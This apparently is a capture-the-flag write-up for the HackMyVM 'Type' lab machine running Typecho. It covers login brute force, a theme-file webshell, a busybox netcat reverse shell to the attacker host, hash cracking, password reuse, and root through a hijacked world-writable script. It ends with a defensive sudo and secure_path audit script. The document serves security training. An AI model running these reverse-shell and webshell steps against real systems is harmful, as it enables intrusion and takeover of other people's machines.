HackMyVM-Type

back to the history and remember when I was born
Thunder crisscrossing an empty sandbox
A life gone hoarse from worthless sounds
For the next thousand years not even grass will grow: it's a planet of sand


Target IP: 192.168.56.58

Difficulty: Medium

Topics covered:

Reconnaissance and initial access: virtual host (vhost) discovery, custom wordlist generation with cewl, directory brute-forcing, wordlist-based admin login brute-forcing.

Web exploitation: sensitive information disclosure (draft access / admin panel abuse), abuse of a Typecho CMS core feature (theme file editing leading to RCE).

Post-exploitation and lateral movement: reading the SQLite database file for privilege escalation, password hash cracking (John the Ripper), password reuse (the web account and the system account share a password).

Linux local privilege escalation (root privesc): sudo environment variable misconfiguration (env_keep+=XAUTHORITY), X11 display forwarding (ssh -X) to get past the headless check, GUI automation with xdotool, writable script hijack (triggered through sudo).


Port scanning

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 192.168.56.58
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-24 02:29 +0000
Nmap scan report for 192.168.56.58 (192.168.56.58)
Host is up (0.00057s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:1F:43:F2 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.34 seconds

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p22,80 192.168.56.58 -sV -sC -T4 -A -O
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-24 02:30 +0000
Nmap scan report for 192.168.56.58 (192.168.56.58)
Host is up (0.00086s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0 (protocol 2.0)
80/tcp open http nginx
|_http-title: type.dsz
|_http-generator: Typecho 1.3.0
MAC Address: 08:00:27:1F:43:F2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.86 ms 192.168.56.58 (192.168.56.58)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.02 seconds

Add the domain to /etc/hosts

192.168.56.58 type.dsz

Visit the domain

Two users show up, admin and sburro; clicking admin's account redirects to another domain, devnotes.dsz

Add that one too

192.168.56.58 type.dsz devnotes.dsz

type.dsz also hints that we should use cewl

cewl http://devnotes.dsz/ > password.txt

Directory scanning

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# dirsearch -u http://devnotes.dsz/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_devnotes.dsz/__26-04-24_02-54-16.txt

Target: http://devnotes.dsz/

[02:54:16] Starting:
[02:54:32] 403 - 548B - /.ht_wsr.txt
[02:54:32] 403 - 548B - /.htaccess.bak1
[02:54:32] 403 - 548B - /.htaccess.orig
[02:54:32] 403 - 548B - /.htaccess.sample
[02:54:32] 403 - 548B - /.htaccess.save
[02:54:32] 403 - 548B - /.htaccess_extra
[02:54:32] 403 - 548B - /.htaccess_orig
[02:54:32] 403 - 548B - /.htaccess_sc
[02:54:32] 403 - 548B - /.htaccessBAK
[02:54:32] 403 - 548B - /.htaccessOLD
[02:54:32] 403 - 548B - /.htaccessOLD2
[02:54:32] 403 - 548B - /.htm
[02:54:32] 403 - 548B - /.html
[02:54:32] 403 - 548B - /.htpasswd_test
[02:54:32] 403 - 548B - /.htpasswds
[02:54:32] 403 - 548B - /.httr-oauth
[02:54:54] 301 - 0B - /1000 -> http://devnotes.dsz/index.php/1000/
[02:54:55] 301 - 0B - /1001 -> http://devnotes.dsz/index.php/1001/
[02:54:55] 301 - 0B - /1991 -> http://devnotes.dsz/index.php/1991/
[02:54:55] 301 - 0B - /1995 -> http://devnotes.dsz/index.php/1995/
[02:54:55] 301 - 0B - /1994 -> http://devnotes.dsz/index.php/1994/
[02:54:55] 301 - 0B - /1993 -> http://devnotes.dsz/index.php/1993/
[02:54:55] 301 - 0B - /1992 -> http://devnotes.dsz/index.php/1992/
[02:54:55] 301 - 0B - /1990 -> http://devnotes.dsz/index.php/1990/
[02:54:55] 301 - 0B - /1997 -> http://devnotes.dsz/index.php/1997/
[02:54:55] 301 - 0B - /1996 -> http://devnotes.dsz/index.php/1996/
[02:54:55] 301 - 0B - /1999 -> http://devnotes.dsz/index.php/1999/
[02:54:55] 301 - 0B - /1998 -> http://devnotes.dsz/index.php/1998/
[02:54:55] 301 - 0B - /2000 -> http://devnotes.dsz/index.php/2000/
[02:54:55] 301 - 0B - /2001 -> http://devnotes.dsz/index.php/2001/
[02:54:55] 301 - 0B - /2005 -> http://devnotes.dsz/index.php/2005/
[02:54:55] 301 - 0B - /2003 -> http://devnotes.dsz/index.php/2003/
[02:54:56] 301 - 0B - /2004 -> http://devnotes.dsz/index.php/2004/
[02:54:56] 301 - 0B - /2009 -> http://devnotes.dsz/index.php/2009/
[02:54:56] 301 - 0B - /2007 -> http://devnotes.dsz/index.php/2007/
[02:54:56] 301 - 0B - /2008 -> http://devnotes.dsz/index.php/2008/
[02:54:56] 301 - 0B - /2002 -> http://devnotes.dsz/index.php/2002/
[02:54:56] 301 - 0B - /2006 -> http://devnotes.dsz/index.php/2006/
[02:54:56] 301 - 0B - /2010 -> http://devnotes.dsz/index.php/2010/
[02:54:56] 301 - 0B - /2011 -> http://devnotes.dsz/index.php/2011/
[02:54:56] 301 - 0B - /2012 -> http://devnotes.dsz/index.php/2012/
[02:54:56] 301 - 0B - /2013 -> http://devnotes.dsz/index.php/2013/
[02:54:57] 301 - 0B - /2014 -> http://devnotes.dsz/index.php/2014/
[02:54:57] 301 - 0B - /2015 -> http://devnotes.dsz/index.php/2015/
[02:54:57] 301 - 0B - /2016 -> http://devnotes.dsz/index.php/2016/
[02:54:57] 301 - 0B - /2017 -> http://devnotes.dsz/index.php/2017/
[02:54:57] 301 - 0B - /2018 -> http://devnotes.dsz/index.php/2018/
[02:54:57] 301 - 0B - /2019 -> http://devnotes.dsz/index.php/2019/
[02:54:58] 301 - 0B - /2020 -> http://devnotes.dsz/index.php/2020/
[02:54:58] 301 - 0B - /2257 -> http://devnotes.dsz/index.php/2257/
[02:55:15] 301 - 162B - /admin -> http://devnotes.dsz/admin/
[02:55:19] 302 - 0B - /admin/ -> http://devnotes.dsz/admin/login.php?referer=http%3A%2F%2Fdevnotes.dsz%2Fadmin%2F
[02:55:21] 302 - 0B - /admin/index.php -> http://devnotes.dsz/admin/login.php?referer=http%3A%2F%2Fdevnotes.dsz%2Fadmin%2Findex.php
[02:55:22] 200 - 5KB - /admin/login.php
[02:56:28] 200 - 0B - /config.inc.php
[02:56:56] 301 - 0B - /feed -> http://devnotes.dsz/index.php/feed/
[02:57:13] 301 - 162B - /install -> http://devnotes.dsz/install/
[02:57:14] 302 - 0B - /install.php -> http://devnotes.dsz/
[02:57:14] 403 - 548B - /install/
[02:57:15] 302 - 0B - /install.php?profile=default -> http://devnotes.dsz/
[02:57:23] 200 - 15KB - /LICENSE.txt
[02:58:54] 301 - 162B - /usr -> http://devnotes.dsz/usr/
[02:58:54] 403 - 548B - /usr/
[02:58:55] 301 - 162B - /var -> http://devnotes.dsz/var/
[02:58:55] 403 - 548B - /var/

Task Completed

The scan turns up a login page; brute-force it with the two usernames found earlier and the cewl wordlist.

Credentials obtained

sburro:DevNotes

In the backend our privileges are low and we cannot change the theme, but then we find a text in the drafts

We suspect it is the admin password; trying to log in with it succeeds.

admin:2DbYCYpXwvV9kKwO

In the admin backend, write a one-line webshell into index.php of the current theme (Appearance).

Testing with the command id shows that the command executes successfully.

Get a reverse shell with busybox

http://devnotes.dsz/index.php?cmd=busybox%20nc%20192.168.56.104%204444%20-e%20sh;
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444127.0.0.1192.168.21.128192.168.56.104192.168.10.150172.17.0.1172.18.0.1
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Type-192.168.56.58-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/Type~192.168.56.58_Linux_x86_64/2026_04_24-03_15_02-976.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
/data/typecho $

Enumerate the host and find the database.

/data/typecho $ ls
LICENSE.txt admin config.inc.php index.php install install.php typecho.zip usr var
/data/typecho $ cd ..
/data/database $ cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
klogd:x:100:101:klogd:/dev/null:/sbin/nologin
nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin
caddy:x:102:104:caddy:/var/lib/caddy:/sbin/nologin
lighttpd:x:103:105:lighttpd:/var/www/localhost/htdocs:/sbin/nologin
plugugly:x:1000:1000::/home/plugugly:/bin/sh
avahi:x:86:86:Avahi System User:/dev/null:/sbin/nologin
messagebus:x:104:106:messagebus:/dev/null:/sbin/nologin
/data $ ls
certs database typecho
/data $ cd database/
/data/database $ ls
typecho.db
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# mv /root/.penelope/Type~192.168.56.58_Linux_x86_64/downloads/data/database/typecho.db .

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# sqlite3 typecho.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
typecho_comments typecho_metas typecho_users
typecho_contents typecho_options
typecho_fields typecho_relationships
sqlite> select * from typecho_users;
1|admin|$P$B/xZAkZ342fLS1sEQwQfsXTVKiBnVG/|admin@type.dsz|http://type.dsz/|admin|1771773701|1777000500|1771815254|administrator|210e70dd6a261e5533998656d6682e03
2|sburro|$P$BfS2sY4Vz6sHjC52095jVAFOjMNyuy1|sburro@type.dsz||sburro|1771774529|1777000205|1771775693|contributor|43792074121946b7b1fc0b8942b218ac
3|plugugly|$P$BuyKfLj9xZ0iLez6SomJNOLGx.7g.U/|plugugly@type.dsz||plugugly|1771812079|0|0|subscriber|
sqlite>

Note that one of these users has the same name as a system user; suspect password reuse

Crack the hash with john

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john hash.txt -show
?:2boobies

1 password hash cracked, 0 left

Credentials obtained

plugugly:2boobies
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh plugugly@192.168.56.58
The authenticity of host '192.168.56.58 (192.168.56.58)' can't be established.
ED25519 key fingerprint is: SHA256:xJ90oWmr5sPR2afHz9etzSdtxINmLI+JvbwgV/iCsWY
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:11: [hashed name]
~/.ssh/known_hosts:92: [hashed name]
~/.ssh/known_hosts:107: [hashed name]
~/.ssh/known_hosts:116: [hashed name]
~/.ssh/known_hosts:139: [hashed name]
~/.ssh/known_hosts:140: [hashed name]
~/.ssh/known_hosts:166: [hashed name]
~/.ssh/known_hosts:177: [hashed name]
(2 additional names omitted)
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.58' (ED25519) to the list of known hosts.
plugugly@192.168.56.58's password:
_
__ _____| | ___ ___ _ __ ___ ___
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
\ V V / __/ | (_| (_) | | | | | | __/
\_/\_/ \___|_|\___\___/|_| |_| |_|\___|

Type:~$

Type:~$ sudo -l
Matching Defaults entries for plugugly on Type:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XAUTHORITY

Runas and Command-specific defaults for plugugly:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User plugugly may run the following commands on Type:
(ALL) NOPASSWD: /root/typer.py
Type:~$ sudo /root/typer.py
qt.qpa.xcb: could not connect to display
qt.qpa.plugin: From 6.5.0, xcb-cursor0 or libxcb-cursor0 is needed to load the Qt xcb platform plugin.
qt.qpa.plugin: Could not load the Qt platform plugin "xcb" in "" even though it was found.
This application failed to start because no Qt platform plugin could be initialized. Reinstalling the application may fix this problem.

Available platform plugins are: linuxfb, vkkhrdisplay, minimal, wayland-egl, minimalegl, xcb, vnc, offscreen, wayland, eglfs.

Aborted
Type:~$

Running this file requires a graphical display.

Use X11 forwarding to send the display to the local Kali box.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh -X plugugly@192.168.56.58
plugugly@192.168.56.58's password:
_
__ _____| | ___ ___ _ __ ___ ___
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
\ V V / __/ | (_| (_) | | | | | | __/
\_/\_/ \___|_|\___\___/|_| |_| |_|\___|

/usr/bin/xauth: file /home/plugugly/.Xauthority does not exist
Type:~$
Type:~$ export XAUTHORITY=/home/plugugly/.Xauthority
Type:~$ sudo /root/typer.py

It is a small typing game that requires our WPM to exceed 60

Use xdotool to simulate keyboard input

sleep 3; xdotool type --delay 20 "It was the best of times, it was the worst of times, it was the age of wisdom, it was the age of foolishness, it was the epoch of belief, it was the epoch of incredulity, it was the season of Light, it was the season of Darkness, it was the spring of hope, it was the winter of despair."

Type:~$ sudo /root/typer.py
Cleanup process started by root...

It starts some process

Upload linpeas and analyze

╔══════════╣ .sh files in path
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path
You can write script: /usr/local/bin/cleanup_scores.sh
/usr/bin/spirv-lesspipe.sh
/usr/bin/findssl.sh
/usr/bin/amuFormat.sh

Type:~$ cat /usr/local/bin/cleanup_scores.sh
#!/bin/sh
echo 'Cleanup process started by root...'
Type:~$

Since the target is a heavily stripped-down Alpine system, just append the reverse-shell command directly.

Type:~$ echo "busybox nc 192.168.56.104 4444 -e sh" >> /usr/local/bin/cleanup_scores.sh
Type:~$ sudo -l
Matching Defaults entries for plugugly on Type:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XAUTHORITY

Runas and Command-specific defaults for plugugly:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User plugugly may run the following commands on Type:
(ALL) NOPASSWD: /root/typer.py
Type:~$ sudo /root/typer.py
Cleanup process started by root...


┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444127.0.0.1192.168.21.128192.168.56.104192.168.10.150172.17.0.1172.18.0.1
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Type-192.168.56.58-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/Type~192.168.56.58_Linux_x86_64/2026_04_24-03_34_38-039.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
/home/plugugly # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/home/plugugly #
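The root path rests on two findings: sudo preserves XAUTHORITY (so the caller decides where the root GUI renders), and a script under secure_path that root executes is writable by everyone. The Python below is an added audit example, not anything from the writeup: it parses the sudo -l text shown above (copied inline, blank lines dropped) and flags files in secure_path directories that a non-root user could edit; the SAMPLE entries are constructed to mirror the linpeas finding.

```python
import os
import re
import stat

# `sudo -l` output for plugugly, copied from the box (raw string keeps sudoers' escaped colons)
SUDO_L = r"""Matching Defaults entries for plugugly on Type:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XAUTHORITY
Runas and Command-specific defaults for plugugly:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"
User plugugly may run the following commands on Type:
    (ALL) NOPASSWD: /root/typer.py
"""


def kept_env(sudo_l_text: str) -> list:
    """Variables sudo preserves (env_keep); XAUTHORITY/DISPLAY let the caller pick where a root GUI renders."""
    names = []
    for raw in re.findall(r'env_keep\+=("[^"]*"|\S+)', sudo_l_text):
        names += raw.strip('"').rstrip(",").split()
    return names


def secure_path_from(sudo_l_text: str) -> list:
    """Directories root-run commands resolve through; sudoers escapes the colons with backslashes."""
    m = re.search(r"secure_path=(\S+)", sudo_l_text)
    return m.group(1).rstrip(",").replace("\\:", ":").split(":") if m else []


def writable_by_others(mode: int, uid: int) -> bool:
    """A file a normal user can edit (group/world write bit, or not root-owned) must never be run by root."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH)) or uid != 0


def audit_entries(entries) -> list:
    """entries are (path, st_mode, st_uid) triples; returns the paths a non-root user could hijack."""
    return [p for p, mode, uid in entries if writable_by_others(mode, uid)]


def audit_dirs(dirs) -> list:
    """Live check: stat every regular file in the given directories and audit them."""
    found = []
    for d in filter(os.path.isdir, dirs):
        for e in os.scandir(d):
            st = e.stat(follow_symlinks=False)
            if stat.S_ISREG(st.st_mode):
                found.append((e.path, st.st_mode, st.st_uid))
    return audit_entries(found)


# Constructed sample modelled on the linpeas finding: cleanup_scores.sh is world-writable, the rest root 0755
SAMPLE = [
    ("/usr/local/bin/cleanup_scores.sh", 0o100777, 0),
    ("/usr/bin/findssl.sh", 0o100755, 0),
    ("/usr/bin/amuFormat.sh", 0o100755, 0),
]
```

On a real host, audit_dirs(secure_path_from(SUDO_L)) runs the same check against the live filesystem; anything it returns is a file root may execute that someone else can rewrite.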


http://example.com/2026/04/24/HackMyVM-Type/
Author: Skyarrow
Posted on: April 24, 2026